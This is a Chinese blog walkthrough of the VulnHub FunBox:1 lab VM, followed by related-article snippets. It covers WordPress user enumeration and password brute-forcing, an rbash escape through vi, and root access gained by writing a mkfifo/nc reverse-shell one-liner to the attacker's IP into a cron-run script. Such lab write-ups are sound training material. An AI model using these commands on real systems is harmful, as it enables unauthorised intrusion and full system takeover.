vulnhub-FunBox-wp

最新推荐文章于 2024-06-14 20:00:00 发布
最新推荐文章于 2024-06-14 20:00:00 发布
阅读量581 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全 web wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yutianovo/article/details/107881570
版权
本文详细介绍了一次针对FunBox靶机的渗透测试过程。从信息搜集开始,利用wpscan获取WordPress用户密码,通过ssh连接并利用rbash逃逸技巧获得正常shell权限。随后,通过一系列操作最终实现提权,获取root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机描述
博客地址 http://blog.yutian233.xyz/

Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min.

This VM is created/tested with Virtualbox. Maybe it works with vmware.

If you need hints, call me on twitter: @0815R2d2

Have fun...


This works better with VirtualBox rather than VMware

https://www.vulnhub.com/entry/funbox-1,518/

清单

  • 信息搜集

    • WordPress

    • wpscan 得到密码

  • 提权

    • rbash 逃逸
    • 权限开放的.sh

主机发现

image-20200807133302606

信息搜集

nmap -A -p- 192.168.0.108

image-20200807123240973

网站由Wordpress搭建

扫描用户

wpscan --url http://funbox.fritz.box/ --enumerate u

image-20200807123422804

有两个用户:admin、joe

对用户爆破密码

image-20200807123510940

image-20200807123533190

admin	iubire
joe 1234

joe用户

使用 ssh连接 shell

image-20200807131213316

可以看到是一个受限的shell

逃逸方法

vi
:set shell=/bin/bash
:shell

即可获得正常的shell

image-20200807131348078

来到用户 funny的目录

输入命令

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.109 2345 >/tmp/f” > .backup.sh

将 .backup.sh的内容覆盖为 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.109 2345 >/tmp/f

image-20200807131436035

输入之前在kali开启监听端口 2345

等待 5 分钟

获得root

image-20200807131659070

funbox-vulnhub靶机-writeup
Lee
08-14 1693
FunBoxWriteup ##0x00 找到目标主机 使用nmap扫描网段,发现目标 nmap -sn 16.16.16.0/24 //发现目标机器IP为16.16.16.157 nmap -A 16.16.16.157 -v //直接nmap全扫 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 636
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
VulnHub_FunBox
qq_45434762的博客
08-29 647
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5887
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
vulnhub-funbox-2-funxbox-rookie rookie wp
yutianovo的博客
09-14 548
靶机描述 Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first. This VM is created/tested with Virtualbox. Maybe it works with vmware. If you ne
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2800
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
Vulnhub靶机Funbox:1 writeup
xingjinhao123的博客
01-11 1593
下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 信息搜集 获取IP地址 扫描端口 这里看到一共开放了四个端口21:ftp,22:ssh,88:http,3306:mysql 21端口 登录ftp的时候需要用户名密码,先放着 80端口 访问80端口发现会跳转到funbox.fritz.box 修改hosts为: 再次访问80端口 这里看到使用了wordpress管理系统 可以使用wpscan尝试枚举下用户和插件: wpscan --url ht
Vulnhub靶场之Funbox
qq_69775412的博客
11-08 1003
信息收集 -> 获取目标IP端口扫描 -> 获取目标IP的端口开放情况及服务版本信息Web端口 -> 目录扫描获取敏感信息,如果是CMS就通过版本信息搜索历史漏洞,如果不是就手工测试其他服务端口 -> 通过服务版本在漏洞库搜索相关漏洞信息通过FTP漏洞获取ROOT权限。之所以说这道题简单,是因为msf攻击成功后直接是root权,不需要其他的提权操作,所以说对新手来说的话还是比较简单的。
Vulnhub靶机:FunBox 1
qq_48904485的博客
01-21 1251
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FunBox 1(10.0.2.26)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/
VulnHub FunBox Writeup
末初 · mochu7
09-27 854
FunBox详情请见:https://www.vulnhub.com/entry/funbox-1,518/ 靶机使用VirtualBox搭建,连接VirtualBox Host-Only网卡,IP为:192.168.56.101 攻击机是VMware下的一台Kali,使用桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 Nmap扫描C段内存活主机 nmap -sP 192.168.56.1/24 发现靶机IP:192.168.56.101 扫描开
vulnhub靶机Funbox10
timesleep的博客
04-07 568
vulnhub靶机Funbox10 首先我们使用kali扫描地址 然后我们对靶机地址进行端口扫描 然后我们访问80端口看下 然后我们使用dirb扫描网站目录、然后我们访问这四个目录看下 只有catalog可以访问,那我们重点就看下这里,根据版本,我们找找到了他有命令执行,参考链接https://bbs.ichunqiu.com/thread-37191-1-1.html 确认并可以访问打开hackbar 执行payload,访问页面 GET:http://127.0.0.1/catal
Vulnhub日记(一):FunboxGaoKao
Dawn_Xi的博客
08-03 549
靶机介绍 FunBox.GaoKao 是作者为初学者设计的机器。这台机器需要一点暴力破解和一些FTP协议的知识。“Funbox Gaokao Walkthrough – Vulnhub – Writeup” 主要参考Krishna Upadhyay的WriteUp所写 虚拟机链接:https://www.vulnhub.com/entry/funbox-gaokao,707/ 开始练习 使用Nmap找到靶机ip:192.168.56.101 本机ip:192.168.56.102 nm.
vulnhub Funbox: GaoKao(funbox9)
箭雨镜屋
04-08 1033
渗透思路:nmap扫描----ftp匿名访问获取可能的用户名----hydra爆破ftp密码----ftp上传反弹shell,等定时任务执行获得shell----bash suid提权
VulnHub渗透测试实战靶场 - Funbox: GaoKao
LYJ20010728的博客
08-28 1131
VulnHub渗透测试实战靶场 - Funbox: GaoKao题目描述环境下载Funbox: Lunchbreaker靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 It's a box for beginners, but not easy. Gather careful !!! Hint: Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per a
FUNBOX-5靶机
小小猪的博客
06-30 403
FUNBOX-5靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.134 扫描靶机端口 访问80端口是默认的apache页面,扫描目录发现robots.txt文件,发现一个,但是试了发现没有,想到下载页面的提示,这里就没有深究 并不是目录 再次看扫描的目录 在之前的目录下拼上index.php发现是可以访问的,还有wp-content目录也是可以访问的,那么接下来就直接上神器wpscan扫描用户,至于wpscan的用法我前面有一篇
靶机:Funbox: Scriptkiddie
weixin_50339323的博客
09-14 503
一、信息收集 1. 获取靶机IP (在扫描靶机IP过程中扫不到IP,更改下靶机的配置文件) 2. 扫描端口 nmap -sC -sV 192.168.8.144 3. 进入web页面 4. 扫目录 发现网站是wordpress搭建的 二、漏洞利用&提权 1. 用wpscan扫描 1)枚举用户名 wpscan --url http://192.168.8.144/ --enunerate u 用户名有admin 2)爆破密码 wpscan ...
Vulnhub靶机:FunBox 5
qq_48904485的博客
01-24 1176
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FunBox 5(10.0.2.30)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-next-level,547/
靶机实战:Funbox10
最新发布
CHAsichuan的博客
06-14 2341
一次中等难度的靶机超详细版记录
Vulnhub-Funbox: Rookie(Funbox2)靶机渗透
m0_68117643的博客
07-07 1316
关于Funbox2这台靶机,运行在Vmware中无法获取靶机IP,尝试桥接、NAT、仅主机三种模式均无果,无奈转用VirtualBox,但NAT和桥接模式下也获取不到IP,仅在host-only模式下才可获取到靶机IP
i-Funbox中文版发布:越狱设备稳定伴侣与移动设备U盘方案
标题《i-Funbox最新简体中文版》意味着我们即将讨论的是一个名为i-Funbox的软件,它发布了最新版本的简体中文版。i-Funbox是一款苹果设备管理工具,主要面向iPhone、iPad以及iPod Touch等设备的用户。它提供了越狱与...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值